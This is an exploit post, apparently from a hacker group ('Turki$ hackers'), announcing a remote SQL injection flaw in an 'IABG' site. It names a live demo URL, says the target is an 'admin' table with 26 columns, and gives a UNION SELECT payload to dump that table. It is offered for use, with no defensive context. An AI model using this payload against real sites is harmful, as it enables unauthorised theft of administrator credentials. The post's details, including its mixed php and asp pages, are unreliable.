IABG suffers from a remote SQL injection vulnerability.
5200a65aea5e60a5f28fdb3d4e0931c7c585b77fe8681373eada26fb87168fc7
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|* ______ ____ __ __ |
|* /\__ _\/\ _`\ /\ \/\ \ |
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } |
|* \ \ \ \ \ _ <'\ \ _ \ |
|* \ \ \ \ \ \L\ \\ \ \ \ \ |
|* \ \_\ \ \____/ \ \_\ \_\ |
|* \/_/ \/___/ \/_/\/_/ |
|* |
|* |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title] :[iabg sql injection vulnerability] /*
\* [Author] :[skote_vahshat] /*
\* [Home] :[Http://turk-bh.ir] /*
\* [Email] :[skote.vahshat@Gmail.Com] /*
=======================================================================
/*Powered-by: php
/* [+]Exploit :
/* https://www.target.com/index.php?id=[SQLi]
/* [+]Demo:
/* https://www.iabg2012.com/english/index.asp?id=[SQLi]
/*
/*[+] table (admin)
/*
/*[+]column number 26
/*
/* +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin
=======================================================================
|_***_| spical thanks : turk-bh.ir members all turkiS hackers|
=======================================================================